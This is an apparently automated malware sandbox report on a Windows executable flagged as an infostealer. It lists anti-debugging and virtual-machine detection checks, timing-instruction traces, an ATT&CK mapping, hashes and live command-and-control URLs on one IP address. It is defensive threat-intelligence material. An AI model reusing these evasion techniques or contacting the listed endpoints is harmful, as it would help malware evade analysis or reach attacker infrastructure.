                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11278 second address: 4A112C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 04h 0x00000005 mov dx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e jmp 00007F7174CEBA8Eh 0x00000013 mov eax, dword ptr [esi+14h] 0x00000016 jmp 00007F7174CEBA90h 0x0000001b mov dword ptr [edx+14h], eax 0x0000001e jmp 00007F7174CEBA90h 0x00000023 mov eax, dword ptr [esi+18h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A112C3 second address: 4A112C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A112C7 second address: 4A112CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A112CB second address: 4A112D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A112D1 second address: 4A1131D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174CEBA92h 0x00000009 and ax, D668h 0x0000000e jmp 00007F7174CEBA8Bh 0x00000013 popfd 0x00000014 jmp 00007F7174CEBA98h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx+18h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov dl, C8h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1131D second address: 4A11322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11322 second address: 4A1136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F7174CEBA97h 0x0000000c and ax, 3FBEh 0x00000011 jmp 00007F7174CEBA99h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+1Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1136A second address: 4A11371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11371 second address: 4A11400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov cx, bx 0x00000011 pop ebx 0x00000012 jmp 00007F7174CEBA96h 0x00000017 popad 0x00000018 mov eax, dword ptr [esi+20h] 0x0000001b jmp 00007F7174CEBA90h 0x00000020 mov dword ptr [edx+20h], eax 0x00000023 jmp 00007F7174CEBA90h 0x00000028 mov eax, dword ptr [esi+24h] 0x0000002b pushad 0x0000002c call 00007F7174CEBA8Eh 0x00000031 push ecx 0x00000032 pop edi 0x00000033 pop esi 0x00000034 mov dx, 95A2h 0x00000038 popad 0x00000039 mov dword ptr [edx+24h], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F7174CEBA94h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11400 second address: 4A11412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FDEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11412 second address: 4A11429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7174CEBA8Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11567 second address: 4A115F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f jmp 00007F7174BA6FDEh 0x00000014 jne 00007F71E4F9515Dh 0x0000001a pushad 0x0000001b call 00007F7174BA6FDEh 0x00000020 mov edi, esi 0x00000022 pop ecx 0x00000023 mov dl, 8Eh 0x00000025 popad 0x00000026 or dword ptr [edx+38h], FFFFFFFFh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007F7174BA6FDBh 0x00000032 pop esi 0x00000033 pushfd 0x00000034 jmp 00007F7174BA6FE9h 0x00000039 add eax, 3672F2A6h 0x0000003f jmp 00007F7174BA6FE1h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A115F1 second address: 4A11643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 jmp 00007F7174CEBA98h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e or dword ptr [edx+3Ch], FFFFFFFFh 0x00000012 jmp 00007F7174CEBA90h 0x00000017 or dword ptr [edx+40h], FFFFFFFFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7174CEBA97h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11643 second address: 4A1167D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7174BA6FE8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1167D second address: 4A11681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11681 second address: 4A11687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007E7 second address: 4A007EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007EB second address: 4A007F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007F1 second address: 4A0080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA99h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0093C second address: 4A00996 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7174BA6FE6h 0x00000008 add esi, 7D7811A8h 0x0000000e jmp 00007F7174BA6FDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007F7174BA6FE8h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e movzx esi, dx 0x00000021 mov di, 0F9Eh 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push edx 0x0000002b pop ecx 0x0000002c mov cx, dx 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0D1C second address: 49E0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0D20 second address: 49E0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0D26 second address: 49E0D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7174CEBA90h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ecx, edi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0D56 second address: 49E0D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 473B29 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 473A34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 622EC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00473AF9 rdtsc 0_2_00473AF9
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 994
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 949
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 866
Source: C:\Users\user\Desktop\file.exe API coverage: 4.2 %
Source: C:\Users\user\Desktop\file.exe TID: 6620 Thread sleep count: 162 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6620 Thread sleep count: 184 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6620 Thread sleep count: 177 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6676 Thread sleep count: 994 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6676 Thread sleep time: -1988994s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6656 Thread sleep count: 949 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6656 Thread sleep time: -1898949s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6620 Thread sleep count: 183 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6620 Thread sleep count: 227 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6620 Thread sleep count: 69 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6620 Thread sleep count: 78 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6660 Thread sleep count: 866 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6660 Thread sleep time: -1732866s >= -30000s
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: file.exe, file.exe, 00000000.00000002.4098648307.0000000000603000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.4100010455.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM
Source: file.exe, 00000000.00000002.4105195935.0000000005270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.4098648307.0000000000603000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 42% for more than 60s
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00473AF9 rdtsc 0_2_00473AF9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_047A7D41 push dword ptr fs:[00000030h] 0_2_047A7D41
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04950D90 mov eax, dword ptr fs:[00000030h] 0_2_04950D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0495092B mov eax, dword ptr fs:[00000030h] 0_2_0495092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418592 GetProcessHeap, 0_2_00418592
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00409A2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A58A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A720 SetUnhandledExceptionFilter, 0_2_0040A720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04959C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04959C91
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0495A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0495A7F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0495D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0495D04A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0495A987 SetUnhandledExceptionFilter, 0_2_0495A987
Source: file.exe, file.exe, 00000000.00000002.4098648307.0000000000603000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: XtProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A2EC cpuid 0_2_0040A2EC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_00410822

                Stealing of Sensitive Information

Source: Yara match. File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match. File source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000003.1671985450.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK Matrix (grouped by tactic; a number in front of a technique is the report's count of matching signatures for it):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: 3 Command and Scripting Interpreter, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: 1 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: 341 Virtualization/Sandbox Evasion, 1 Process Injection, 1 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 12 Software Packing, 1 DLL Side-Loading
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: 1 System Time Discovery, 771 Security Software Discovery, 341 Virtualization/Sandbox Evasion, 3 Process Discovery, 1 Application Window Discovery, 213 System Information Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: 2 Encrypted Channel, 2 Ingress Tool Transfer, 1 Non-Application Layer Protocol, 11 Application Layer Protocol, Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Antivirus detection for the submitted file (Source / Detection / Scanner / Label):
file.exe: 37%, ReversingLabs, Win32.Infostealer.Tinba
file.exe: 100%, Joe Sandbox ML
No Antivirus matches for dropped files, unpacked PE files or domains
Antivirus detection for URLs (Source / Detection / Scanner / Label):
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1002: 100%, Avira URL Cloud, malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubL: 100%, Avira URL Cloud, malware
http://185.156.72.65/K: 0%, Avira URL Cloud, safe
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub767: 100%, Avira URL Cloud, malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-0: 100%, Avira URL Cloud, malware
                No contacted domains info
Contacted URLs (Name / Malicious / Antivirus Detection / Reputation):
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub: malicious: false; antivirus detection: none; reputation: high
URLs from memory and binary strings (Name / Source / Malicious / Antivirus Detection / Reputation):
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubL; source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl; source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp; malicious: false; antivirus detection: none; reputation: unknown
http://185.156.72.65/K; source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: safe; reputation: unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-0; source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1002; source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub767; source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
Contacted IPs (IP / Domain / Country / ASN / ASN Name / Malicious):
185.156.72.65: domain unknown; Russian Federation; ASN 44636 (ITDELUXE-ASRU); malicious: true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1565680
                    Start date and time:2024-11-30 14:36:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes were analyzed, report is missing behavior information
                    • VT rate limit hit for: file.exe
                    Time | Type | Description
                    08:37:25 | API Interceptor | 11535948x Sleep call for process: file.exe modified
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    185.156.72.65 | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    | file.exe | Get hash | malicious | Amadey, Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    | file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    | file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | Browse | 185.156.72.65/soft/download
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/soft/download
                    | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.156.72.65/files/download
                    No context
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    ITDELUXE-ASRU | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Amadey, Nymaim | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                    | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.947016563329295
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:2'024'448 bytes
                    MD5:d2a93d9f269cbd3b444400d586999e01
                    SHA1:3d9df1a3c04f61e2ed1f89a0fc42021dd120546b
                    SHA256:f4c52e24f469d177317286ffccf86673a2ab2fb4164a47fd1898151b85a13e05
                    SHA512:d18b087882522a0a2641e0f6feb319715daca688bf60e8160b617d34b82738cd916e02634a8c678a81df83e8f039e078e1bccd6bcc3f1f06e64ed42778c067c1
                    SSDEEP:49152:CuM5YAYiAa4YgaAYhDmSZ8MMaFFIM9MyGO3YhpTW:dMkiAfYg6hDmA7sbyGI0
                    TLSH:6F9533B462F5031CC39808B24A3319E7C8C7E99778E932E91798F1ED7569E02757F48A
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.
                    Icon Hash:cfa99b8a8651798d
                    Entrypoint:0x8bf000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007F71750256EAh
                    cmpps xmm3, dqword ptr [esi], 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007F71750276E5h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
